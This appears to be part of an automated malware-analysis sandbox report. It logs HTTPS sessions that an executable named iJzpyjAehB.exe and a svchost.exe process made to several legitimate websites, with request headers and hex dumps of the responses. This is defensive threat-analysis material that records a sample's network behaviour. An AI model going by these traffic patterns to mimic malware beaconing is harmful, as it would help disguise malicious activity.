                                                                                                                                                                                                                                                                        Data Ascii: div> </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        139192.168.2.662444188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC1954OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2069INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:27 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:27 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KINy3dBaPLMMhebE3BafFqgo87pYPwYk7Bq%2FgckDg3Ch2jYEGBBJ7JR%2BU7VtPQzo0rXEFwJDJz%2BJqqzKq%2FyVTP%2BHzr47xjI2ndUh%2B%2BqJIcKTzf66LFmJ88fi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a86aae888ffe-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2070INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2070INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        14192.168.2.65266191.229.22.126443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC161OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: pleszew.policja.gov.pl
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC162INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:51 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC162INData Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65
                                                                                                                                                                                                                                                                        Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC178INData Raw: 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 20 20 2d 2d 0d 0a 32 30 30 30 0d 0a 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 20 0d 0a 20 20 3c 21 2d 2d 20 20 63 6f 6e 74 65 6e 74 2d 6c 65 66 74 20 20 2d 2d 3e 0d 0a 20 20 3c 61 72 74 69 63 6c 65 20 69 64 3d 22 77 74 78 74 22 20 63 6c 61 73 73 3d 22 6d 61 69 6e 4c 65 66 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 20 61 6b 74 75 61 6c
                                                                                                                                                                                                                                                                        Data Ascii: </div> </div> </article> </section> </section></div>... topnews. -->... content --2000><div id="content"> ... content-left --> <article id="wtxt" class="mainLeft"> ... aktual
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC194INData Raw: 74 3a 31 37 39 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 0d 0a 31 30 30 30 0d 0a 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22
                                                                                                                                                                                                                                                                        Data Ascii: t:179px;margin-bottom:10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?1000v=1657112618" alt="Zosta jednym z nas - PRACA W POLICJI" /></a></div><div class="item"
                                                                                                                                                                                                                                                                        2023-03-10 06:56:14 UTC210INData Raw: 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 66 6f 6f 74 65 72 3e 0d 0a 20 20 20 20 20 20 3c 21 2d 2d 20 66 6f 6f 74 65 72 20 2e 2d 2d 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2d 2d 3e 0d 0a 20 20 09 3c 64 69 76 20 69 64 3d 22 62 61 63 6b 2d 74 6f 2d 74 6f 70 22 3e 3c 61 20 68 72 65 66 3d 22 23 70 61 67 65 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 0d 0a 61 34 0d 0a 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 50 6f 77 72 c3 b3 74 20 6e 61 20 67 c3 b3 72 c4 99 20 73 74 72 6f 6e 79 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 09 3c 21 2d 2d 20 47 6f 54 6f 54 6f 70 20 20 2e 2d
                                                                                                                                                                                                                                                                        Data Ascii: div> </div> </footer> ... footer .--> </div> ... GoToTop --> <div id="back-to-top"><a href="#page"><span></span><span a4class="sr-only">Powrt na gr strony</span></a></div> ... GoToTop .-


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        140192.168.2.662477172.67.156.49443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2023OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: orlyhotel.com
                                                                                                                                                                                                                                                                        Cookie: django_language=en
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2079INHTTP/1.1 500 Internal Server Error
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:27 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 06:46:31 GMT
                                                                                                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:46:31 GMT
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Vary: Accept-Language
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eMlJ%2BhHYsNp1LknQq0Mru%2BYtfUhfyI8y5qmRNHXf%2FeYvTF9T3Qc0zSdbzkqwPebCuYzClVC7J9DEZGTVFKAE%2B4QCTWBw1EmWMmJHjP1XpysGpnwWLYGi4T3kCNVsS7Fi"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a86af9f93825-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2080INData Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 1b<h1>Server Error (500)</h1>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2080INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        141192.168.2.662505188.114.97.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2036OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: sigtoa.com
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2070INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:27 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Permissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                                                                                                        Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                        Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OxFK0%2FZCBuym6U7iRdwjb7DAwxR%2FsK11lRaQ0aecg2zx9S7eR09QZNVpz7mnlEOCYm9i6ayGyTXiWqVljhpvKBzzYQg7LxsgdbxUsnLBb7boFL20m0PkyrK6S1Is"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a86b58eb3719-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2071INData Raw: 31 65 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78
                                                                                                                                                                                                                                                                        Data Ascii: 1ea7<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=Edge"> <meta name="robots" content="noindex
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2071INData Raw: 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 73 74 79 6c 65 73 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 77 72 61 70 70 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 20 68 31 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73
                                                                                                                                                                                                                                                                        Data Ascii: ,initial-scale=1"> <link href="/cdn-cgi/styles/challenges.css" rel="stylesheet"> </head><body class="no-js"> <div class="main-wrapper" role="main"> <div class="main-content"> <h1 class="zone-name-title h1"> <img clas
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2073INData Raw: 22 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 66 5f 74 6b 3d 4f 66 67 43 57 46 5f 4e 6d 35 59 47 6b 31 6c 2e 64 66 54 6d 32 75 73 38 70 46 30 4f 65 6f 61 77 65 33 77 57 71 70 6a 2e 4f 67 38 2d 31 36 37 38 34 33 31 33 38 37 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 65 6e 63 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 6d 64 22 20 76 61 6c 75 65 3d 22 67 2e 65 73 4c 53 51 53 5f 45 6f 51 58 4f 5f 47 55 63 51 59 43 41 31 69 30 45 4f 55 56 6f 76 37 62 58 66 39 78 36 62 5a 76 4a 55 2d 31 36 37 38 34 33 31 33 38 37 2d 30 2d 41 53
                                                                                                                                                                                                                                                                        Data Ascii: "/?__cf_chl_f_tk=OfgCWF_Nm5YGk1l.dfTm2us8pF0Oeoawe3wWqpj.Og8-1678431387-0-gaNycGzNCPs" method="POST" enctype="application/x-www-form-urlencoded"> <input type="hidden" name="md" value="g.esLSQS_EoQXO_GUcQYCA1i0EOUVov7bXf9x6bZvJU-1678431387-0-AS
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2074INData Raw: 6d 4a 55 4e 54 4e 44 45 72 7a 62 69 5f 67 74 77 48 36 53 32 6f 50 44 32 4a 61 5f 45 43 49 41 47 4d 77 51 4f 58 6b 4e 46 6f 45 36 49 4e 72 46 4b 44 4a 51 79 30 30 54 78 59 2d 2d 33 4d 62 59 73 68 4b 7a 46 69 67 75 31 49 63 41 63 53 76 76 66 71 55 33 49 6e 76 39 41 51 35 30 43 48 39 47 6d 73 55 64 41 79 71 6d 70 6e 45 6c 68 76 77 71 6d 75 32 61 36 54 75 4e 43 6b 77 64 48 64 51 4f 48 52 55 63 6f 58 52 36 67 6b 41 74 41 43 46 67 33 58 39 6f 4a 49 78 64 35 39 47 34 71 45 6c 4c 69 71 52 71 4f 61 39 2d 77 67 68 6f 71 32 52 77 69 4f 72 52 4f 76 34 34 45 69 43 31 41 44 53 49 6e 6c 55 59 42 46 2d 5f 75 70 73 78 38 46 33 7a 38 6d 53 64 34 51 66 46 36 4e 74 6a 2d 4b 6b 32 49 74 35 37 4c 65 75 79 32 64 53 48 2d 42 45 77 47 7a 57 7a 4d 35 77 69 41 74 76 6e 54 2d 5f 66
                                                                                                                                                                                                                                                                        Data Ascii: mJUNTNDErzbi_gtwH6S2oPD2Ja_ECIAGMwQOXkNFoE6INrFKDJQy00TxY--3MbYshKzFigu1IcAcSvvfqU3Inv9AQ50CH9GmsUdAyqmpnElhvwqmu2a6TuNCkwdHdQOHRUcoXR6gkAtACFg3X9oJIxd59G4qElLiqRqOa9-wghoq2RwiOrROv44EiC1ADSInlUYBF-_upsx8F3z8mSd4QfF6Ntj-Kk2It57Leuy2dSH-BEwGzWzM5wiAtvnT-_f
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2075INData Raw: 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 48 61 73 68 3a 20 27 39 63 30 64 34 35 64 37 39 30 34 33 39 62 33 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 4f 66 67 43 57 46 5f 4e 6d 35 59 47 6b 31 6c 2e 64 66 54 6d 32 75 73 38 70 46 30 4f 65 6f 61 77 65 33 77 57 71 70 6a 2e 4f 67 38 2d 31 36 37 38 34 33 31 33 38 37 2d 30 2d 67 61 4e 79 63 47 7a 4e 43 50 73 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 46 50 57 76 3a 20 27 67 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 54 69 6d 65 4d 73 3a 20 27 31 30 30 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 4d 54 69 6d 65 4d 73 3a 20 27 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 54 70 6c 56 3a 20 34 2c 0a 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: ', cHash: '9c0d45d790439b3', cUPMDTk: "\/?__cf_chl_tk=OfgCWF_Nm5YGk1l.dfTm2us8pF0Oeoawe3wWqpj.Og8-1678431387-0-gaNycGzNCPs", cFPWv: 'g', cTTimeMs: '1000', cMTimeMs: '0', cTplV: 4,
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2077INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 69 32 3a 20 27 78 67 37 4b 54 4d 43 7a 51 35 43 48 64 52 61 48 34 4c 72 32 45 51 3d 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7a 68 3a 20 27 64 4c 68 39 34 5a 58 4c 73 4d 61 54 6f 47 44 33 2f 71 39 42 69 75 6d 61 63 36 79 78 51 56 55 5a 34 63 32 6a 74 34 59 4a 6e 61 55 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 75 68 3a 20 27 66 78 75 35 2f 69 51 76 50 2f 7a 6e 41 4c 39 38 63 46 50 70 7a 30 44 6a 72 6d 45 33 6f 34 34 57 4d 64 5a 72 36 61 5a 51 52 73 51 3d 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 68 3a 20 27 6a 57 32 78 52 42 73 71 57 31 76 4c 74 75 42 6f 6f 58 39 61 4b 6d 45 44 32 63 5a 68 41 4c 37 73 6b 44 59 49 30 4d 48 64 72 6c 6b 3d 27 2c 0a 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                        Data Ascii: i2: 'xg7KTMCzQ5CHdRaH4Lr2EQ==', zh: 'dLh94ZXLsMaToGD3/q9Biumac6yxQVUZ4c2jt4YJnaU=', uh: 'fxu5/iQvP/znAL98cFPpz0DjrmE3o44WMdZr6aZQRsQ=', hh: 'jW2xRBsqW1vLtuBooX9aKmED2cZhAL7skDYI0MHdrlk=',
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2078INData Raw: 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70 6f 29 3b 0a 20 20 20 20 7d 28 29 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 22 20 72 6f 6c 65 3d 22 63 6f 6e 74 65 6e 74 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
                                                                                                                                                                                                                                                                        Data Ascii: po.onload = function() { history.replaceState(null, null, ogU); }; } document.getElementsByTagName('head')[0].appendChild(cpo); }());</script> <div class="footer" role="contentinfo"> <div clas
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2079INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        142192.168.2.6625795.189.171.125443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2079OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: www.muhr-soehne.de
                                                                                                                                                                                                                                                                        2023-03-10 06:56:27 UTC2079INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:27 GMT
                                                                                                                                                                                                                                                                        Server: Apache/2.4.38 (Debian)
                                                                                                                                                                                                                                                                        Last-Modified: Thu, 02 Mar 2023 15:05:19 GMT
                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                        Content-Length: 51841
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
